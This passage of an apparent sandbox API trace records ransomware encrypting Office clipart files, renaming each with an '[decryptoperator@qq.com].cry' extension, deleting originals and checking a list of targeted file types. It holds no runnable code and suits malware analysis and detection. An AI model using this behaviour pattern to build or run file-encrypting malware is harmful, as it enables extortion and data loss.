SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0053.408] GetLastError () returned 0x0 [0053.408] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x57f4, lpOverlapped=0x0) returned 1 [0053.473] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x5800, lpOverlapped=0x0) returned 1 [0053.474] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.474] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.474] SetEndOfFile (hFile=0x164) returned 1 [0053.475] CloseHandle (hObject=0x164) returned 1 [0053.475] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.475] SetEndOfFile (hFile=0x20c) returned 1 [0053.475] CloseHandle (hObject=0x20c) returned 1 [0053.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.476] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf")) returned 1 [0054.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.119] lstrlenW (lpString=".doc") returned 4 [0054.119] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.119] lstrlenW (lpString=".docx") returned 5 [0054.119] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.119] lstrlenW (lpString=".pdf") returned 4 [0054.119] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.119] lstrlenW (lpString=".xls") returned 4 [0054.119] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.121] lstrlenW (lpString=".xlsx") returned 5 [0054.121] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.121] lstrlenW (lpString=".ppt") returned 4 [0054.121] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.121] lstrlenW (lpString=".zip") returned 4 [0054.121] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.121] lstrlenW (lpString=".rar") returned 4 [0054.121] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.121] lstrlenW (lpString=".bz2") returned 4 [0054.121] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.121] lstrlenW (lpString=".7z") returned 3 [0054.121] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.121] lstrlenW (lpString=".dbf") returned 4 [0054.121] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.121] lstrlenW (lpString=".1cd") returned 4 [0054.121] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63 [0054.121] lstrlenW (lpString=".jpg") returned 4 [0054.121] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.734] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.734] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0054.734] GetLastError () returned 0x0 [0054.734] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x5f00, lpOverlapped=0x0) returned 1 [0054.953] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x5f10, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x5f10, lpOverlapped=0x0) returned 1 [0055.128] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.129] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.129] SetEndOfFile (hFile=0x164) returned 1 [0055.252] CloseHandle (hObject=0x164) returned 1 [0055.257] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.257] SetEndOfFile (hFile=0x230) returned 1 [0055.258] CloseHandle (hObject=0x230) returned 1 [0055.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.259] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf")) returned 1 [0055.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0055.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0055.259] lstrlenW (lpString=".doc") returned 4 [0055.259] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.259] lstrlenW (lpString=".docx") returned 5 [0055.259] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.259] lstrlenW (lpString=".pdf") returned 4 [0055.259] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.259] lstrlenW (lpString=".xls") returned 4 [0055.259] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.259] lstrlenW (lpString=".xlsx") returned 5 [0055.259] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.259] lstrlenW (lpString=".ppt") returned 4 [0055.259] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0055.259] lstrlenW (lpString=".zip") returned 4 [0055.259] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.259] lstrlenW (lpString=".rar") returned 4 [0055.259] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.259] lstrlenW (lpString=".bz2") returned 4 [0055.259] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.259] lstrlenW (lpString=".7z") returned 3 [0055.259] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0055.259] lstrlenW (lpString=".dbf") returned 4 [0055.259] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0055.259] lstrlenW (lpString=".1cd") returned 4 [0055.259] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0055.259] lstrlenW (lpString=".jpg") returned 4 [0055.260] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.260] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=47786) returned 1 [0055.260] CloseHandle (hObject=0x230) returned 1 [0055.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 0x20 [0055.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0055.260] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.260] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0055.261] GetLastError () returned 0x0 [0055.261] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0xbaaa, lpOverlapped=0x0) returned 1 [0055.457] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xbab0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xbab0, lpOverlapped=0x0) returned 1 [0055.458] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.458] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.458] SetEndOfFile (hFile=0x194) returned 1 [0055.459] CloseHandle (hObject=0x194) returned 1 [0055.459] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.459] SetEndOfFile (hFile=0x230) returned 1 [0055.460] CloseHandle (hObject=0x230) returned 1 [0055.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.460] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 1 [0055.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0055.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0055.460] lstrlenW (lpString=".doc") returned 4 [0055.460] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.460] lstrlenW (lpString=".docx") returned 5 [0055.460] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.460] lstrlenW (lpString=".pdf") returned 4 [0055.460] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.460] lstrlenW (lpString=".xls") returned 4 [0055.460] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.461] lstrlenW (lpString=".xlsx") returned 5 [0055.461] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.461] lstrlenW (lpString=".ppt") returned 4 [0055.461] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0055.461] lstrlenW (lpString=".zip") returned 4 [0055.461] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.461] lstrlenW (lpString=".rar") returned 4 [0055.461] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.461] lstrlenW (lpString=".bz2") returned 4 [0055.461] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.461] lstrlenW (lpString=".7z") returned 3 [0055.461] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0055.461] lstrlenW (lpString=".dbf") returned 4 [0055.461] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0055.461] lstrlenW (lpString=".1cd") returned 4 [0055.461] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0055.461] lstrlenW (lpString=".jpg") returned 4 [0055.461] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.461] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=7966) returned 1 [0055.461] CloseHandle (hObject=0x230) returned 1 [0055.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 0x20 [0055.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0055.462] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.462] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0055.462] GetLastError () returned 0x0 [0055.462] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1f1e, lpOverlapped=0x0) returned 1 [0055.501] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1f20, lpOverlapped=0x0) returned 1 [0055.502] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.502] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.502] SetEndOfFile (hFile=0x194) returned 1 [0055.516] CloseHandle (hObject=0x194) returned 1 [0055.517] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.517] SetEndOfFile (hFile=0x230) returned 1 [0055.517] CloseHandle (hObject=0x230) returned 1 [0055.517] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.518] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 1 [0055.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0055.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0055.518] lstrlenW (lpString=".doc") returned 4 [0055.518] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.518] lstrlenW (lpString=".docx") returned 5 [0055.518] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.518] lstrlenW (lpString=".pdf") returned 4 [0055.518] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.518] lstrlenW (lpString=".xls") returned 4 [0055.518] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.518] lstrlenW (lpString=".xlsx") returned 5 [0055.518] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.518] lstrlenW (lpString=".ppt") returned 4 [0055.518] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0055.518] lstrlenW (lpString=".zip") returned 4 [0055.518] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.518] lstrlenW (lpString=".rar") returned 4 [0055.518] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.518] lstrlenW (lpString=".bz2") returned 4 [0055.518] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.519] lstrlenW (lpString=".7z") returned 3 [0055.519] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0055.519] lstrlenW (lpString=".dbf") returned 4 [0055.519] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0055.519] lstrlenW (lpString=".1cd") returned 4 [0055.519] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63 [0055.519] lstrlenW (lpString=".jpg") returned 4 [0055.519] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.519] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=15733) returned 1 [0055.519] CloseHandle (hObject=0x230) returned 1 [0055.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif")) returned 0x20 [0055.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0055.521] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.521] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0055.521] GetLastError () returned 0x0 [0055.521] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x3d75, lpOverlapped=0x0) returned 1 [0055.559] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0055.560] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.560] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.560] SetEndOfFile (hFile=0x194) returned 1 [0055.560] CloseHandle (hObject=0x194) returned 1 [0055.560] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.560] SetEndOfFile (hFile=0x230) returned 1 [0055.561] CloseHandle (hObject=0x230) returned 1 [0055.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif")) returned 1 [0055.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0055.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0055.561] lstrlenW (lpString=".doc") returned 4 [0055.562] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0055.562] lstrlenW (lpString=".docx") returned 5 [0055.562] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0055.562] lstrlenW (lpString=".pdf") returned 4 [0055.562] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0055.562] lstrlenW (lpString=".xls") returned 4 [0055.562] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0055.562] lstrlenW (lpString=".xlsx") returned 5 [0055.562] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0055.562] lstrlenW (lpString=".ppt") returned 4 [0055.562] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0055.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0055.562] lstrlenW (lpString=".zip") returned 4 [0055.562] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0055.562] lstrlenW (lpString=".rar") returned 4 [0055.562] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0055.562] lstrlenW (lpString=".bz2") returned 4 [0055.562] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0055.562] lstrlenW (lpString=".7z") returned 3 [0055.562] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0055.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0055.562] lstrlenW (lpString=".dbf") returned 4 [0055.562] lstrcmpiW (lpString1=".dbf", 